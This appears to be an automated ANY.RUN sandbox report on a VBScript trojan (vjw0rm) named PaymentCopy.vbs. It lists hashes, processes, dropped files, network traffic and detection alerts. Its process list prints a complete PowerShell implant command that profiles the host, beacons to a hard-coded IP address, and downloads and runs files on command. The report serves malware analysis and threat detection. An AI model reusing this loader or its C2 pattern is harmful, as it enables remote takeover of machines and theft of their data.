analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

PaymentCopy.vbs

Full analysis: https://app.any.run/tasks/4ded1af0-4e70-462a-829a-5c1eb79b349b
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Malware Trends Tracker     >>>
Analysis date: March 22, 2019, 12:33:33
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
vjworm
Indicators:
MIME: text/plain
File info: Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
MD5:

9178E64DF050C917F956BE8CC221F526

SHA1:

64A6C8AE40C5DE0D88D64E1AF5AF0722D7735CA7

SHA256:

6FEC545A4626D727A243FECC86700EEB0F1529080FA1CB4288B8815FC97A8892

SSDEEP:

768:S9ijh9abIoEQ0wCZXjuO8Oh6nNmAOg1pWJ/c3zkdzeqeP77qxZPiwbIqxZPMtxZq:aEsapLR

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Writes to a start menu file

      • WScript.exe (PID: 1844)

    • VJWORM was detected

      • WScript.exe (PID: 1552)

    • Connects to CnC server

      • WScript.exe (PID: 1552)

  • SUSPICIOUS

    • Executes scripts

      • cmd.exe (PID: 4000)
      • cmd.exe (PID: 1352)

    • Uses IPCONFIG.EXE to discover IP address

      • cmd.exe (PID: 4000)
      • cmd.exe (PID: 1352)

    • Creates files in the user directory

      • WScript.exe (PID: 1844)
      • powershell.exe (PID: 1248)
      • WScript.exe (PID: 1552)

    • Starts CMD.EXE for commands execution

      • WScript.exe (PID: 1844)

    • Executes PowerShell scripts

      • WScript.exe (PID: 3976)

    • Connects to unusual port

      • WScript.exe (PID: 1552)
      • powershell.exe (PID: 1248)

  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.txt | Text - UTF-16 (LE) encoded (66.6)
.mp3 | MP3 audio (33.3)
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
9
Malicious processes
3
Suspicious processes
3

Behavior graph

Click at the process to see the details
start wscript.exe cmd.exe no specs cmd.exe no specs ipconfig.exe no specs ipconfig.exe no specs #VJWORM wscript.exe wscript.exe no specs powershell.exe ipconfig.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1844"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\PaymentCopy.vbs"C:\Windows\System32\WScript.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
4000"C:\Windows\System32\cmd.exe" /c ipconfig /release&C:\Users\admin\AppData\Local\Temp\htvjs.js&ipconfig /renewC:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1352"C:\Windows\System32\cmd.exe" /c ipconfig /release&C:\Users\admin\AppData\Local\Temp\cbvdms.vbs&ipconfig /renewC:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2520ipconfig /releaseC:\Windows\system32\ipconfig.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
IP Configuration Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2344ipconfig /releaseC:\Windows\system32\ipconfig.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
IP Configuration Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1552"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\htvjs.js" C:\Windows\System32\WScript.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Version:
5.8.7600.16385
3976"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\cbvdms.vbs" C:\Windows\System32\WScript.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
1248"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$spl = '\';$vn = 'Guest';function info { try {$mch = [environment]::Machinename;$usr = [environment]::username;$HWD = (Get-WmiObject Win32_LogicalDisk).VolumeSerialNumber;$HWD = $HWD[0];$wi = (Get-WmiObject Win32_OperatingSystem).Caption;$wi = $wi + (Get-WmiObject Win32_OperatingSystem).OSArchitecture;$wi =$wi.replace('64-bit',' x64').replace('32-bit',' x86');$av = (Get-WmiObject -Namespace 'root/SecurityCenter2' -Class 'AntiVirusProduct').displayname;$e = $env:windir + '\Microsoft.NET\Framework\v2.0.50727\vbc.exe';if (test-path $e) {$nt = 'YES'} else {$nt= 'NO'}; if (test-path 'HKCU:\vdw0rm') {$usb = 'TRUE'} else { $usb = 'FALSE'};$u = $vn + '_' + $HWD + $spl + $mch + $spl + $usr + $spl + $wi + $spl + $av + $spl + $spl + $nt + $spl + $usb + $spl;return $u} catch {Start-Sleep -s 3}};function post ($cmdv, $v) { try { $enc = [system.Text.Encoding]::UTF8;$Req = [System.Net.HttpWebRequest]::Create('http://103.1.184.108:2213/' + $cmdv);$Req.Method = 'POST';$req.UserAgent = info;[System.IO.Stream]$stm;$stm = $Req.GetRequestStream();$Y = $enc.GetBytes([byte][char]$V);$Stm.Write($Y, 0, $Y.Length);$stm.close();$resp = $req.GetResponse().GetResponseStream();$sr = New-Object System.IO.StreamReader($resp);$v=$sr.ReadToEnd();$sr.close();return [string]$v } catch {Start-Sleep -s 3}};$infinite =$true;while($infinite) {$cmd = @(post('Vre','').ToString());$T,$T1,$T2 = $cmd[1] -csplit 'ameer',3;if ($T -eq 'exc') { try {(New-Object System.Net.WebClient).DownloadFile($T1, $env:temp + '\' + $T2);[Diagnostics.Process]::Start($env:temp + '\' + $T2) } catch {Start-Sleep -s 3}}; if ($T -eq 'Sc') { Try {[IO.File]::AppendAllText($env:temp + '\' + $T2,$T1);[Diagnostics.Process]::Start($env:temp + '\' + $T2)} Catch {Start-Sleep -s 3} }; if ($T -eq 'Rn') { try { $Gb = [system.Text.Encoding]::Default;[IO.File]::WriteAllBytes($env:temp + '\' + $T2,$Gb.GetBytes($T1));[Diagnostics.Process]::Start($env:temp + '\' + $T2) } catch { Start-Sleep -s 3 } }; if ($T -eq 'Up') { try { $Gb = [system.Text.Encoding]::Default;[IO.File]::WriteAllBytes($env:temp + '\' + $T2,$Gb.GetBytes($T1));[Diagnostics.Process]::Start($env:temp + '\' + $T2); exit } catch { Start-Sleep -s 3 } };if ($T -eq 'Cl') { exit };$T = $null;$T1= $null;$T2 = $null;Start-Sleep -s 7}"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2544ipconfig /renewC:\Windows\system32\ipconfig.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
IP Configuration Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 479
Read events
1 377
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
4
Unknown types
0

Dropped files

PID
Process
Filename
Type
1248powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K2W2VG2KQDU8VEKSOBCE.temp
MD5:
SHA256:
1248powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:7100C9D54A32DFE02751A9E1BC41F804
SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C
1248powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFf9978.TMPbinary
MD5:7100C9D54A32DFE02751A9E1BC41F804
SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C
1844WScript.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PaymentCopy.vbstext
MD5:9178E64DF050C917F956BE8CC221F526
SHA256:6FEC545A4626D727A243FECC86700EEB0F1529080FA1CB4288B8815FC97A8892
1552WScript.exeC:\Users\admin\AppData\Roaming\htvjs.jstext
MD5:6BD610CCF2F47A428DC4AE4CAB4A5EED
SHA256:0D2E9D49F49AB90D97CF8A4079FD09F70271D7C30D30B9498E2265F266023549
1844WScript.exeC:\Users\admin\AppData\Local\Temp\cbvdms.vbstext
MD5:E928EA6853357FF1842E7BCFB71C051F
SHA256:2283BB0DDE058ECF67DF1A4590A149D6B32DC67CB809236D696C01931455FADF
1844WScript.exeC:\Users\admin\AppData\Local\Temp\htvjs.jstext
MD5:6BD610CCF2F47A428DC4AE4CAB4A5EED
SHA256:0D2E9D49F49AB90D97CF8A4079FD09F70271D7C30D30B9498E2265F266023549
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
12
TCP/UDP connections
31
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1552
WScript.exe
POST
103.1.184.108:2318
http://103.1.184.108:2318/Vre
AU
malicious
1552
WScript.exe
POST
103.1.184.108:2318
http://103.1.184.108:2318/Vre
AU
malicious
1552
WScript.exe
POST
103.1.184.108:2318
http://103.1.184.108:2318/Vre
AU
malicious
1552
WScript.exe
POST
404
103.1.184.108:2318
http://103.1.184.108:2318/Vre
AU
xml
345 b
malicious
1552
WScript.exe
POST
404
103.1.184.108:2318
http://103.1.184.108:2318/Vre
AU
xml
345 b
malicious
1552
WScript.exe
POST
404
103.1.184.108:2318
http://103.1.184.108:2318/Vre
AU
xml
345 b
malicious
1552
WScript.exe
POST
404
103.1.184.108:2318
http://103.1.184.108:2318/Vre
AU
xml
345 b
malicious
1552
WScript.exe
POST
404
103.1.184.108:2318
http://103.1.184.108:2318/Vre
AU
xml
345 b
malicious
1552
WScript.exe
POST
404
103.1.184.108:2318
http://103.1.184.108:2318/Vre
AU
xml
345 b
malicious
1552
WScript.exe
POST
404
103.1.184.108:2318
http://103.1.184.108:2318/Vre
AU
xml
345 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1248
powershell.exe
103.1.184.108:2213
TPG Telecom Limited
AU
malicious
1552
WScript.exe
103.1.184.108:2318
TPG Telecom Limited
AU
malicious

DNS requests

No data

Threats

PID
Process
Class
Message
1552
WScript.exe
A Network Trojan was detected
MALWARE [PTsecurity] VJworm activity
1552
WScript.exe
A Network Trojan was detected
MALWARE [PTsecurity] vjw0rm
1552
WScript.exe
A Network Trojan was detected
MALWARE [PTsecurity] VJworm activity
1552
WScript.exe
A Network Trojan was detected
MALWARE [PTsecurity] vjw0rm
1552
WScript.exe
A Network Trojan was detected
MALWARE [PTsecurity] VJworm activity
1552
WScript.exe
A Network Trojan was detected
MALWARE [PTsecurity] vjw0rm
1552
WScript.exe
A Network Trojan was detected
MALWARE [PTsecurity] VJworm activity
1552
WScript.exe
A Network Trojan was detected
MALWARE [PTsecurity] vjw0rm
1552
WScript.exe
A Network Trojan was detected
MALWARE [PTsecurity] VJworm activity
1552
WScript.exe
A Network Trojan was detected
MALWARE [PTsecurity] vjw0rm
24 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
PaymentCopy.vbs